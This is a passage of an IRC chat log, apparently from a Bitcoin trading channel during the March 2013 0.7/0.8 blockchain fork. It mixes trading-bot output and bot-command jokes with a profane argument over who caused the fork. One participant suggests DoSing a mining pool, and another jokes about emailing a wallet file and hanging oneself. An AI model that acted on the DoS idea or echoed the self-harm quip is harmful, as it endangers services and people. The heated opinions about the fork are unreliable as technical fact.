for updated proxy lists Mar 12 00:39:03 smickles almost like a botnet. Mar 12 00:39:13 shhh :P Mar 12 00:39:39 that is how botnets work tho, isn't it? Mar 12 00:40:38 i think i've lost every bitbet bet i've made Mar 12 00:40:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [-] Mar 12 00:40:56 except the ufo ones Mar 12 00:41:20 i can make you a special 'yes and no is switched' interface Mar 12 00:41:26 lol Mar 12 00:41:50 kakobrekla you know this may be a workable idea ? Mar 12 00:42:00 put a link on main page, "Bad luck lately ?" Mar 12 00:42:07 ahah Mar 12 00:42:09 if person clicks it site is color switched (everything) Mar 12 00:42:16 lol, what an idea Mar 12 00:42:16 and yes/no also switched in menus but not in actual effect. Mar 12 00:42:27 so they go for yes but it bets no Mar 12 00:42:34 and we see how many people actyually use that. Mar 12 00:42:56 first get your email working Mar 12 00:43:12 dude i'm asking you for the difficult, you're asking me for the impossible. Mar 12 00:43:20 :D Mar 12 00:43:21 email is too hard. i can get finger working this week Mar 12 00:43:27 and maybe gopher Mar 12 00:43:45 maybe i should upgrade the php proxies to also forward mail. Mar 12 00:43:51 tux will just die. Mar 12 00:44:00 i'm down with finger instead of this twitter stuff Mar 12 00:44:20 haha, come to mpexbot to check your email ! Mar 12 00:44:38 totally. Mar 12 00:44:49 hey smickles! implement an $email command Mar 12 00:44:56 it just returns "No new emails received" Mar 12 00:45:02 to mess with noobs. Mar 12 00:45:07 lol Mar 12 00:45:09 $mail \n 3 ways to a larger PENIS Mar 12 00:45:15 lol Mar 12 00:45:36 it should have a list. if person is not on that list, "You're not cool enough for this service sorry." Mar 12 00:45:38 need a mutt plugin Mar 12 00:45:51 $markov Mar 12 00:45:52 and if you can, hire a group to make it happenj Mar 12 00:46:04 you can charge like .01 btc for lifetime membership or something Mar 12 00:47:11 and it's spelled PEN1S anyway Mar 12 00:47:42 [BTCTC] [BTC-BOND] 6 @ 0.00999 = 0.0599 BTC [+] Mar 12 00:49:18 you goddamn hacker how did you get my password Mar 12 00:49:43 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [-] Mar 12 00:49:50 lol Mar 12 00:49:55 ;;slab puq Mar 12 00:49:56 Error: "slab" is not a valid command. Mar 12 00:50:17 how do you mean no slab? Mar 12 00:50:22 nano should fix this Mar 12 00:50:32 is of no comprehension his. Mar 12 00:50:39 ;;ticker Mar 12 00:50:39 BTCUSD ticker | Best bid: 48.16000, Best ask: 48.18310, Bid-ask spread: 0.02310, Last trade: 48.16000, 24 hour volume: 41803.52824419, 24 hour low: 45.47100, 24 hour high: 48.46900, 24 hour vwap: 47.48502 Mar 12 00:52:10 no this is fucking logo http://alerts.gw.gd/ Mar 12 00:52:19 now* Mar 12 00:52:57 its a shame geocities is down. mpex hosted via geocities would just be perfect Mar 12 00:53:15 I swear its synergy throwing away half my keystrokes Mar 12 00:53:22 dub ahaha totally all the gimp effects Mar 12 00:54:25 $email Mar 12 00:54:27 smickles: No new messages received. Mar 12 00:55:26 $email Mar 12 00:55:27 ThickAsThieves: To sign up for this service, contact smickles. Cost will be 0.01 BTC. Mar 12 00:55:30 lol Mar 12 00:55:54 $list SupyMPEx Mar 12 00:55:55 smickles: depth, email, post, proxies, and vwap Mar 12 00:56:23 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 12 00:56:27 i assume all email revenue goes to making mpex aesthetic improvements Mar 12 00:56:28 the list just keeps growing. In two weeks, we'll have something like nano's gribble on our hands Mar 12 00:56:45 $email Mar 12 00:56:47 mircea_popescu: No new messages received. Mar 12 00:56:53 omg im so cool Mar 12 00:56:58 eat that hat3rs Mar 12 00:57:06 smickles: nice! Mar 12 00:57:23 kakobrekla as you can see, i received no mail. Mar 12 00:57:38 fu :P Mar 12 00:57:47 check ur spam folder Mar 12 00:57:55 $spam Mar 12 00:58:05 spam detected Mar 12 00:59:07 Intel X25-E Extreme SSDSA2SH064G1GC Mar 12 00:59:09 go me. Mar 12 00:59:28 [BTCTC] [BITVPS] 1 @ 0.00401 BTC [-] Mar 12 00:59:30 [BTCTC] [BITVPS] 50 @ 0.004 = 0.2 BTC [-] Mar 12 01:03:21 ;;ticker Mar 12 01:03:22 BTCUSD ticker | Best bid: 48.19322, Best ask: 48.19341, Bid-ask spread: 0.00019, Last trade: 48.19322, 24 hour volume: 41895.49680393, 24 hour low: 45.47100, 24 hour high: 48.46900, 24 hour vwap: 47.48907 Mar 12 01:04:27 thank you maximian, if that was you Mar 12 01:04:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19999 BTC [-] Mar 12 01:09:52 what tha, btc24 now second largest exchange? that was fast Mar 12 01:10:22 whos btc24 even ? Mar 12 01:10:27 beh, they got their own bots on the exchnage not that it matters Mar 12 01:10:34 bitcoin-24.com http://bitdata.com/articles/102 Mar 12 01:11:01 i see bitstamp at 150k Mar 12 01:11:27 or you meant eur ? Mar 12 01:11:34 ya ok Mar 12 01:11:53 not sure how bitdata compiled that chart. it isnt eur specific Mar 12 01:12:10 [MPEX] [O.BTCUSD.C470T] 192 @ 0.19228973 = 36.9196 BTC [+] Mar 12 01:12:20 puts bitstamp and btc24 at %2 behind mtgox both Mar 12 01:12:29 sorry #2 not %2 Mar 12 01:13:31 i swear to god they have their own bots running on the exchange. not sure what the objective is but see some bots responding with <200ms timing Mar 12 01:13:59 marketmaking neh ? Mar 12 01:14:19 ;;ticker Mar 12 01:14:20 BTCUSD ticker | Best bid: 48.10003, Best ask: 48.19000, Bid-ask spread: 0.08997, Last trade: 48.19000, 24 hour volume: 41520.07762161, 24 hour low: 45.47100, 24 hour high: 48.46900, 24 hour vwap: 47.51308 Mar 12 01:14:38 perhaps. just mapped their bots edges and it tends to push it's own reserve volume over other bids that it thinks are too low Mar 12 01:15:01 up to a certain limit, perhaps set based on numbers of averages on other exchnages Mar 12 01:15:08 maybe its an arbitrage protection bot, or not sure Mar 12 01:15:11 this is probably a recipe for disaster Mar 12 01:15:24 have everyone entering fake trades based on the other people's fake trades averages Mar 12 01:15:27 bitstamp is fucked and ran by idiots Mar 12 01:15:32 in fact it's probably the main source of volatility atm Mar 12 01:16:05 [BTCTC] [CRYPTO-TRADE] 4 @ 0.19999 = 0.8 BTC [-] Mar 12 01:16:43 mircea_popescu: what do you mean by fake trades? I think on btc24, unlike mtgox, if you buy your fiat gets locked and you cant make another order. same on sell. of course their own local bots could fake, but i could not prove this. and actually they wouldnt have to fake, if all they really want to do is some moderate protection from arbitrage Mar 12 01:16:57 gesell if the exchange is running it's own bot, Mar 12 01:17:05 and it is feeding it from the trades on other exchanges Mar 12 01:17:09 except everyone does this Mar 12 01:17:18 the net result is a positive feedback loop of great danger Mar 12 01:18:25 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Mar 12 01:18:55 mircea_popescu: i cant wrap my head around how that would all play out. just assume before running any bot one would make comfortable limits, and some way to guage when things are getting out of control so you know when to turn off Mar 12 01:19:11 heh. Mar 12 01:19:19 i hear that, i'm thinking bitcoinica. Mar 12 01:21:02 other than being hacked dont remember bitcoinica gaming the market Mar 12 01:21:15 did you read their leaked emails ? Mar 12 01:21:39 where find ^^? Mar 12 01:22:18 mircea_popescu: havent no Mar 12 01:23:17 http://pastebin.com/Ya6iN8RT Mar 12 01:24:11 tempted to pause timer and read Mar 12 01:24:36 what timer is that Mar 12 01:24:49 billing. Mar 12 01:26:24 but also would like to close out workblock, make commits, email people "yay" and go play with dog and lady Mar 12 01:26:25 so Mar 12 01:26:39 balancing priorities. Mar 12 01:27:19 such balance is apparent in the sorting of the [dog ; lady] set. Mar 12 01:27:37 oh you Mar 12 01:27:39 lol Mar 12 01:28:00 maybe i alpha sort everything on the outfeed, huh? Mar 12 01:28:30 in reality, dog needs tiring first Mar 12 01:28:32 otherwise Mar 12 01:28:48 INAPPROPRIATE CUDDLES Mar 12 01:31:03 heh Mar 12 01:32:34 PSA : starting yest MPEx is adding 0.001 fee to all txs, whether needed or not (it's almost never actually needed). Support teh network! Mar 12 01:33:56 wat. Mar 12 01:34:25 oic. Mar 12 01:56:18 [BTCTC] [S.DICE-PT] 30 @ 0.00557 = 0.1671 BTC [-] Mar 12 01:59:44 reading a digest of the bitcoin-dev chan, i am struck by how incredibly pompous these people are. Mar 12 01:59:53 seriously know. who told them they know shit and when exactly ?! Mar 12 02:00:25 [BTCTC] [GSDPT] 20 @ 0.00524 = 0.1048 BTC [+] Mar 12 02:04:56 [BTCTC] [B.YABMC] 1 @ 0.01987 BTC [+] Mar 12 02:05:18 [BTCTC] [B.YABMC] 11 @ 0.01988 = 0.2187 BTC [+] Mar 12 02:06:41 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1796 = 0.3592 BTC [-] Mar 12 02:26:22 mircea_popescu: Mar 12 02:26:27 $depth s.mpoe Mar 12 02:26:28 smickles: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:26:29 smickles: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:28:21 that;'s not bad actually Mar 12 02:28:44 here's a tricky thing : Mar 12 02:29:07 would it be possible for the bot to keep a count of the chat lines during past 5 minutes and send that response by pm if value > 50 ? Mar 12 02:29:46 and also send it by pm if it's been sent to the main chat during the past 1 hr Mar 12 02:30:02 basically just send it to pm. Mar 12 02:30:40 lol Mar 12 02:30:42 not EXACTLY Mar 12 02:30:44 it would be easist to just send it to pm Mar 12 02:30:54 well i guess it would, yeah. Mar 12 02:30:55 up to you Mar 12 02:31:06 do you think it's spammy as is? Mar 12 02:31:09 as is no Mar 12 02:31:14 but it has the potential to become. Mar 12 02:31:20 also side note, pm is short for 'picku mater' which roughty translates for 'mothers cunt' Mar 12 02:31:26 to* Mar 12 02:31:35 pizda ma-tii. Mar 12 02:31:53 eastern europe is firmly decided on pm = yo momma's. Mar 12 02:32:03 :) Mar 12 02:32:13 well, kakobrekla if you think people are using it too often, let me know and I will switch it to pm response Mar 12 02:32:37 aha Mar 12 02:32:43 lets see what happens then Mar 12 02:34:55 wait so one must use it 5 times an hour ? Mar 12 02:35:15 lol totally. Mar 12 02:35:24 mkay better get started Mar 12 02:35:25 yup, also, i added email service to mpexbot Mar 12 02:35:29 $depth s.mpoe Mar 12 02:35:30 $depth s.mpoe Mar 12 02:35:30 kakobrekla: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:35:30 $depth s.mpoe Mar 12 02:35:30 $depth s.mpoe Mar 12 02:35:30 $depth s.mpoe Mar 12 02:35:32 kakobrekla: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:35:33 kakobrekla: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:35:34 kakobrekla: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:35:35 kakobrekla: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:35:35 kakobrekla: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:35:37 kakobrekla: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:35:38 kakobrekla: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:35:39 kakobrekla: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:35:40 kakobrekla: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:35:44 i still think my idea was the most elegant Mar 12 02:35:44 T_T Mar 12 02:35:45 no spam. Mar 12 02:36:08 ;;echo $depth s.mpoe Mar 12 02:36:08 $depth s.mpoe Mar 12 02:36:09 gribble: Bids: ['5 @ 73163', '5539 @ 73162', '4961 @ 72543', '10000 @ 71102', '10000 @ 70102'] Mar 12 02:36:10 gribble: Asks: ['502 @ 76717', '12095 @ 76718', '1399 @ 77988', '54540 @ 77999', '500000 @ 78000'] Mar 12 02:36:23 i might need to fiddle with the 'abuse' configs Mar 12 02:36:43 o looky. Mar 12 02:36:44 $depth s.dice Mar 12 02:36:46 smickles: Bids: ['100 @ 530012', '81 @ 530011', '800 @ 530000', '500 @ 520000', '10 @ 520000'] Mar 12 02:36:47 smickles: Asks: ['9299 @ 569996', '1000 @ 569997', '2000 @ 570000', '148 @ 599990', '48346 @ 600000'] Mar 12 02:37:24 lol Mar 12 02:37:55 evoorhees good thinking on upping the you lost returns. Mar 12 02:42:37 https://bitcointalk.org/index.php?topic=151593.msg1609610#msg1609610 Mar 12 02:42:43 totally qualified to give advice. Mar 12 02:42:55 fork drama next Mar 12 02:43:19 yeah be careful with the big bucks till the fork is resolved Mar 12 02:44:25 how long is it yet ? Mar 12 02:46:28 looks like about 5 blocks Mar 12 02:47:15 fleshwound Mar 12 02:47:16 yuss Mar 12 02:47:21 inb4 $2 Mar 12 02:47:37 dub: i called 2 hours ago Mar 12 02:47:41 satoshi dice pausing till resolved Mar 12 02:47:58 er, i called $2, hours ago Mar 12 02:48:10 curse you ambiguity Mar 12 02:48:10 [BTCTC] [BTC-TRADING-PT] 8 @ 0.1796 = 1.4368 BTC [-] Mar 12 02:48:28 ;;ticker Mar 12 02:48:29 BTCUSD ticker | Best bid: 47.75902, Best ask: 47.83005, Bid-ask spread: 0.07103, Last trade: 47.83005, 24 hour volume: 42125.00556719, 24 hour low: 45.54000, 24 hour high: 48.46900, 24 hour vwap: 47.65497 Mar 12 02:51:17 now would be a great time to dos guild Mar 12 02:51:29 any kids watching? :) Mar 12 02:52:19 is this fork in any way related to the two asic miners ? Mar 12 02:52:26 ie, is one avalon sponsored and the other am sponsored ? Mar 12 02:52:47 is this a scam? Mar 12 02:53:07 no its a block size issue affecting BDB in 0.7 Mar 12 02:53:11 according to -dev Mar 12 02:53:27 so basically they fucvked up the upgrade. Mar 12 02:53:36 0.8 is unaffected so 0.7 and 0.8 miners have forked Mar 12 02:53:46 as in, "it's a blocksize issue we've introduced with 0.8" Mar 12 02:53:52 fix is to move majority hashing back to 0.7 Mar 12 02:53:59 anyone want to help me with a e-poll Mar 12 02:54:01 these pompous assholes. Mar 12 02:54:03 so if guild went down now it would be teh bitpocalypse Mar 12 02:54:04 it has real world results Mar 12 02:54:25 mircea_popescu: no Mar 12 02:54:29 oh ? Mar 12 02:54:30 ;;bc,convert eur Mar 12 02:54:30 1 BTC = 47.70000 U.S. dollars = 36.6923077 Euros Mar 12 02:54:35 mircea_popescu switch dns? :p Mar 12 02:54:42 kakobrekla lol. Mar 12 02:54:43 mircea_popescu: its a previously unheard of issue with BDB, the block size triggered it Mar 12 02:54:54 dub SO THEY FUCKED UP THE UPGRADE. Mar 12 02:55:03 jesus passing the buck is like a tradition in bitcoin-devtalk Mar 12 02:55:10 mircea_popescu: well no, dice fucked up the blockchain Mar 12 02:55:14 yaya Mar 12 02:55:21 by creating blocks too big for 0.7 Mar 12 02:55:34 "let's hide the fact that we suck at coding by falsely accusing someone else of doing things such as trying to externalise their costs on others"\ Mar 12 02:55:39 we only know about it because half the network is on 0.8 Mar 12 02:55:41 "which happens to be exactly what we're doing" Mar 12 02:55:57 [BTCTC] [ASICMINER-PT] 2 @ 0.774998 = 1.55 BTC [-] Mar 12 02:56:03 tell them i expect an apology for this idiocy. Mar 12 02:56:18 fuckwits need to learn some humility presto. Mar 12 02:56:21 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Mar 12 02:56:25 seems like they could really fuck things up from this point still Mar 12 02:56:33 http://micropoll.com/t/KE9JQZQhrI vote for "good love" Mar 12 02:56:39 top three bands get to play Mar 12 02:56:46 trying to make sure my frind's band plays Mar 12 02:56:51 its a big venue for him Mar 12 02:56:53 mkay. Mar 12 02:56:55 fixing the network to make dice fit is the trigger Mar 12 02:56:58 do it or die Mar 12 02:57:06 dub would you stop already ? Mar 12 02:57:10 their mommies made them do it ? Mar 12 02:57:31 jcpham done. they owe me a bra now. Mar 12 02:57:51 k Mar 12 02:58:09 mircea_popescu: big blocks are the problem here Mar 12 02:58:18 dub no. Mar 12 02:58:25 they did not know what their own code did. Mar 12 02:58:27 that is the problem here. Mar 12 02:58:33 they pushed an unsafe upgrade, without a clue. Mar 12 02:58:35 that is the problem. Mar 12 02:58:42 they only discovered it once it blew up. Mar 12 02:58:44 that is the problem. Mar 12 02:58:45 well, no Mar 12 02:58:48 how no ? Mar 12 02:58:51 but I can see you are decided Mar 12 02:58:56 i'm askin. Mar 12 02:59:02 because the problem is increasing teh blocksize not 0.8 Mar 12 02:59:08 ... Mar 12 02:59:09 dude. Mar 12 02:59:16 how is the problem "increasing the blocksizer" Mar 12 02:59:22 this is the same coolaid of saying "sd is hte problem" Mar 12 02:59:28 because 0.7 nodes can't handle them Mar 12 02:59:32 no dood. the problem is bad code, not the real world constraints that expose it sucks. Mar 12 02:59:35 WHY NOT Mar 12 03:00:06 because the database sucks Mar 12 03:00:09 orly Mar 12 03:00:13 it;'s the db now right ? Mar 12 03:00:21 no Mar 12 03:00:23 why not jesus ? jesus sucks so devs can't code. Mar 12 03:00:36 because the bug in BDB wasn't encountered before because the number of transactions in a block that trigger it wasnt valid before Mar 12 03:00:41 dun dun dun Mar 12 03:00:46 Okay SatoshiDice is on pause now. Receiving bets but not processing anything. Mar 12 03:00:49 fyi Mar 12 03:00:51 so what, we write bugs and that's ok if nobody forces our nose in it "? Mar 12 03:01:03 cause we're too busy acting the knowful shitheads on -dev ? Mar 12 03:01:04 fuck that. Mar 12 03:01:19 dub so ? Mar 12 03:01:36 I think its too early to know if its bdb itself or bitcoins implementation Mar 12 03:01:48 how about bitcoin implementing something that failed is on the devs Mar 12 03:01:50 period. Mar 12 03:02:05 it's not tested enough to release yet, do not release it. Mar 12 03:02:21 what is this, 1955, we're discovering software engineering ? Mar 12 03:02:35 heh Mar 12 03:03:10 im just annoyed that we're not at $2 yet Mar 12 03:03:19 come on guys, its panic time if ever there was Mar 12 03:03:28 i'm sick and tired of the young cocks circlejerk attitude. Mar 12 03:03:45 a. they know shit ; b. they don't even know a. wtf. Mar 12 03:05:21 let's see how this plays out Mar 12 03:07:02 [HAVELOCK] [SDICE] 5 @ 0.56 = 2.8 BTC [+] Mar 12 03:12:24 speakign of circlejerk Mar 12 03:12:46 fucking assholes now want to talk about my offer after a week of bullshit Mar 12 03:13:09 sooo what happens if i do this Mar 12 03:13:11 and I'm now ready to buy a different house Mar 12 03:13:13 ;;bc,stats Mar 12 03:13:16 Current Blocks: 225435 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 356 blocks | Next Difficulty In About: 2 days, 5 hours, 24 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Mar 12 03:13:42 ;;estimate Mar 12 03:13:43 Next difficulty estimate | None based on data since last change | 5496120.07656 based on data for last three days Mar 12 03:14:26 0 diff would be neat Mar 12 03:15:32 so if they are forked, then anyone mining the dropped fork is fukt Mar 12 03:15:34 right? Mar 12 03:15:38 yes. Mar 12 03:15:45 also an issue of doublespends. Mar 12 03:15:49 (incoming) Mar 12 03:15:58 and anyone helping to push the old fork gets super low diff Mar 12 03:15:59 ? Mar 12 03:16:07 nah both ends are same diff Mar 12 03:16:26 oh cuz it wont change til the specific block Mar 12 03:18:08 if one forks gets to actually the diff block Mar 12 03:18:14 then they will have divergent difficulty Mar 12 03:18:33 luckily there's still a ways to go Mar 12 03:19:08 gox better not stop this crash Mar 12 03:19:24 you know they will Mar 12 03:19:47 ;;ticker Mar 12 03:19:48 BTCUSD ticker | Best bid: 45.50110, Best ask: 45.60134, Bid-ask spread: 0.10024, Last trade: 45.00000, 24 hour volume: 55914.86095949, 24 hour low: 45.00000, 24 hour high: 48.46900, 24 hour vwap: 47.30466 Mar 12 03:19:52 heh. Mar 12 03:20:26 gox didnt halt trading? Mar 12 03:21:02 i imagine they only halted payouts Mar 12 03:21:15 trading can in principle continuewith what they have deposited in btc and freely on usd. Mar 12 03:21:34 payins i mean. people paying them. Mar 12 03:23:04 whois defunctzombie? Mar 12 03:23:13 he'so offering to halt trading if gox does Mar 12 03:23:17 and halted processing deposits Mar 12 03:23:28 crash? Mar 12 03:23:55 Chaang-Noi more like momentary panic. Mar 12 03:24:02 :) Mar 12 03:24:11 blockchain is firked Mar 12 03:24:15 litecoin is moving on up, crazy Mar 12 03:24:18 and forked Mar 12 03:24:20 and fucked Mar 12 03:24:40 what is the news with gox, just woke up? Mar 12 03:24:52 update regarding effects of blockchain issues on bitfunder. https://bitfunder.com/market Mar 12 03:24:58 bitcoin forked into 0.7 and 0.8 chains Mar 12 03:25:10 pools were todl to increase blocksize Mar 12 03:25:11 pools are rolling back to 0.7 to fix Mar 12 03:25:14 someo made them too big Mar 12 03:25:17 https://bitcointalk.org/index.php?topic=152027.0 Mar 12 03:25:18 it forked? oh fuuuuck Mar 12 03:25:23 and olrder clients shat themselves Mar 12 03:25:30 end of story. Mar 12 03:25:34 nothing malicious Mar 12 03:25:47 so coins in our new clients are they gone? Mar 12 03:25:49 no, just stupid. Mar 12 03:25:53 nah chang Mar 12 03:26:01 you just shouldn't credit payments for a bit. Mar 12 03:26:02 Chaang-Noi: that depends on what happens after blockchain merger Mar 12 03:26:08 mircea_popescu is correct Mar 12 03:26:11 you SHOULD be fine Mar 12 03:26:16 oh fuck me Mar 12 03:26:16 but put things on hold Mar 12 03:26:26 everyone go take a walk and get some food and come bac in a few hours Mar 12 03:26:39 glad i has 150,000 as a back up crypto currancy Mar 12 03:26:48 LTC Mar 12 03:26:56 you have 150k ? Mar 12 03:26:56 x.x Mar 12 03:27:00 heh you sold 50k 'eh Mar 12 03:27:04 mircea_popescu: loving the WTC ref Mar 12 03:27:11 dub heh. Mar 12 03:27:21 yeah ltc could never get this bug because that many transactions in litecoin would never propogate quickly enough to get included in a block Mar 12 03:27:24 i have not made a btc payment for about 12 hours, will this make me saffer even if i use the new client? Mar 12 03:27:42 Chaang-Noi: just wait Mar 12 03:28:09 is there a link with more info on the forum or something? Mar 12 03:28:19 http://sourceforge.net/mailarchive/message.php?msg_id=30587843 Mar 12 03:28:25 thanks Mar 12 03:28:38 Chaang-Noi your outgoing payments are safe Mar 12 03:28:49 meh - its only down 4, less than 10% Mar 12 03:28:50 crediting incomingpayments may be unsafe, if they are doublespent across the forks Mar 12 03:28:51 not a crash Mar 12 03:29:01 and then they merge into one that doesn't include you being paid. Mar 12 03:29:02 and wrong chat. =D Mar 12 03:33:48 mp i sold 50k ltc yesterday for btc, odds on this being accepted? Mar 12 03:33:55 ;;ticker Mar 12 03:33:56 BTCUSD ticker | Best bid: 43.12000, Best ask: 44.50000, Bid-ask spread: 1.38000, Last trade: 43.12000, 24 hour volume: 62664.75566320, 24 hour low: 43.12000, 24 hour high: 48.46900, 24 hour vwap: 46.92695 Mar 12 03:34:05 Meow Mar 12 03:34:10 All right, what the fuck is going on Mar 12 03:34:25 SELL SELL SELL !!! Mar 12 03:36:17 hm 1k sold and price went down 3$ Mar 12 03:36:25 This is a huge blow to bitcoin. WTF I thought its supposed to be secure Mar 12 03:36:29 my guess miner hardware related. total wild guess Mar 12 03:37:00 why do they even need to change the code Mar 12 03:37:01 bitcoin been failing a bit lately Mar 12 03:37:16 alot of flaws being exposed Mar 12 03:37:20 this is glorious Mar 12 03:37:22 BitHub: http://bit.ly/wAIBGJ Mar 12 03:37:38 ? Mar 12 03:37:44 btw Mar 12 03:37:49 this will rpolyl drive ltc prices up Mar 12 03:37:50 ;) Mar 12 03:37:55 BitHub they've been doing this shit since day one Mar 12 03:37:56 :) Mar 12 03:38:01 wallet was plaintext for like 2 years Mar 12 03:38:07 it's just that now btc is worth half a bn dollars Mar 12 03:38:09 almost done with my mini ltc project Mar 12 03:38:17 mircea do you think the bitcoin foundation will pay out a compensation? lul Mar 12 03:38:30 reparations! Mar 12 03:38:38 damn straight Mar 12 03:38:40 BitHub i'd be more than happy if the usual pompous idiots came out with an apology. Mar 12 03:38:50 Ukto tell me more, i heart ltc Mar 12 03:39:03 mircea who's fault is it? Mar 12 03:39:03 mircea_popescu: you know the answer right Mar 12 03:39:09 dub yes. Mar 12 03:39:15 mircea_popescu: because 'not ready for primetime' Mar 12 03:39:23 BitHub i'm not going to go into that level of detail. Mar 12 03:39:36 mircea_popescu: its obvious they don't want adoption Mar 12 03:39:47 wow.. what will the institutional investors think Mar 12 03:39:49 dub yes, they want it forever this niche toy where they matter. Mar 12 03:39:59 mircea_popescu: at least for the next 100 years Mar 12 03:39:59 when i told them they'll be pushed aside coupla months ago i guess they groked it Mar 12 03:40:03 all good, but yeah, makes me think they could just do this sort of stuff on purpose just to manipulate the price Mar 12 03:40:26 BitHub they're for the most part not intelligent enough to understand the point or value of money. Mar 12 03:40:33 they just want dorks admiring them. Mar 12 03:40:55 to be honest i have noticed the lack of like really really god like programmers Mar 12 03:41:45 oh this is gettgin good Mar 12 03:41:56 what is getting good Mar 12 03:41:58 where is the url Mar 12 03:41:59 you cant downgrade to 0.7 Mar 12 03:42:01 feed us Mar 12 03:42:03 or getting bad Mar 12 03:42:04 https://bitcointalk.org/index.php?topic=152027.0 Mar 12 03:42:06 without prev blkindex Mar 12 03:42:09 satoshi, save us Mar 12 03:42:16 dub obviously ? Mar 12 03:42:20 yeah where is Lord Satoshi? Mar 12 03:42:21 mistebigg again Mar 12 03:42:27 someone stab him in teh face Mar 12 03:42:28 he needs to come in and fix these n00bs mistake Mar 12 03:42:30 the only way is basically foer the people who upgraded to downtime Mar 12 03:42:35 let the smarter folks merge it Mar 12 03:42:37 then pay for a blk Mar 12 03:42:43 and no reindex in 0.7 so you have to download and validate the chain Mar 12 03:42:48 da fuck did you think tho ? Mar 12 03:42:52 which workd REALLY WELL Mar 12 03:43:00 lul @ In re Bitcoin Devs are idiots Mar 12 03:43:12 BitHub: they kinda are Mar 12 03:43:16 i've got an uptodate .7 chain for s2cm funds Mar 12 03:43:21 ima have to read this :) Mar 12 03:44:43 smickles see if anyone wants to pay you 50 btc for it Mar 12 03:44:55 ;;ticker Mar 12 03:44:56 BTCUSD ticker | Best bid: 45.00000, Best ask: 45.10989, Bid-ask spread: 0.10989, Last trade: 45.00000, 24 hour volume: 66465.70498496, 24 hour low: 43.11000, 24 hour high: 48.46900, 24 hour vwap: 46.77472 Mar 12 03:44:58 hey Mar 12 03:44:59 wtf Mar 12 03:44:59 45 Mar 12 03:45:09 ;;sell 1 "0.7 blockchain" @ 50 btc Mar 12 03:45:10 Order id 13963 created. Mar 12 03:45:14 Bowjob: see https://bitcointalk.org/index.php?topic=152030 Mar 12 03:45:17 what bullshit is this Mar 12 03:45:17 this actually scares me.. that bitcoin can be compromised like this Mar 12 03:45:24 there you go smickles Mar 12 03:45:27 I thought we're supposed to be unhackable and shit Mar 12 03:45:35 lol Mar 12 03:45:36 ahaha Mar 12 03:45:36 yeah bowjob Mar 12 03:45:41 its getting scammy hey Mar 12 03:45:48 the pyramid is being exposed Mar 12 03:45:49 btc is fragile as a cracked egg Mar 12 03:45:58 Everyone move to lite coin! Mar 12 03:46:04 i've got a chain that was last updated dec 29th... Mar 12 03:46:07 i mean bitcoind Mar 12 03:46:34 just email your wallet.dat to the bitcoin foundation tell them they've won and then hang yourself Mar 12 03:47:09 heheh Mar 12 03:47:11 Umm I'm using electrum does it run ot 0.08 Mar 12 03:47:12 .. Mar 12 03:47:15 wtf Mar 12 03:47:31 Bowjob don't be a fool. If you actually saw the devs react to this and remedy it, you'd be very impressed Mar 12 03:47:43 people should expect bugs Mar 12 03:47:56 it's how resilient btc is in the face of them that matters Mar 12 03:48:28 Bowjob the design is very strong. Mar 12 03:48:33 the implementation is very poor. Mar 12 03:48:48 mircea_popescu: have you considered hiring people to work on it? Mar 12 03:48:59 pizzaman1337 suppose bitcoin was written by mpex devs. Mar 12 03:49:02 would you use it ? Mar 12 03:49:08 if everyone else did Mar 12 03:49:10 bitcoin is so resilient it only took one satoshidice to break it Mar 12 03:49:19 that's no way to go about things. Mar 12 03:49:25 btc-e trollbox is celebrating Mar 12 03:49:27 so what's the best solution? Mar 12 03:49:31 there's a lot of intrinsic strength in the open and independent dev model. Mar 12 03:49:40 hand the code over to bill gates Mar 12 03:49:41 the problem is that much like anything else of the kind, it depends on keeping politics low. Mar 12 03:49:50 wikipedia for instance is similar, and failed for similar reasons. Mar 12 03:49:53 mircea_popescu: shorting possitions on mpex? Mar 12 03:49:58 politics, emotions, egos Mar 12 03:49:59 gesell not so far. Mar 12 03:50:05 ack Mar 12 03:50:09 well not a bitcoin issue, the old db was a problem Mar 12 03:50:09 go ahead Mar 12 03:50:16 no, just curious Mar 12 03:50:21 vampireb don't you start. read up a little eh. Mar 12 03:50:43 gesell: you want to short s.mpoe? Mar 12 03:50:44 why doesn't the bitcoin foundation use all that money to actually hire proper programmers Mar 12 03:50:48 with resumes and stuff Mar 12 03:50:52 hmm? start what? i read pleter's explanation, what isnt clear? Mar 12 03:51:03 are asics safe and compatible after this? Mar 12 03:51:09 vampireb read up the context in the channel you're talking. Mar 12 03:51:11 isn't that the foundation job? or not really? Mar 12 03:51:16 will this spill over into the discussion of soft limits and sdice foo? Mar 12 03:51:21 Bowjob doesn't have much to do with asics this Mar 12 03:51:26 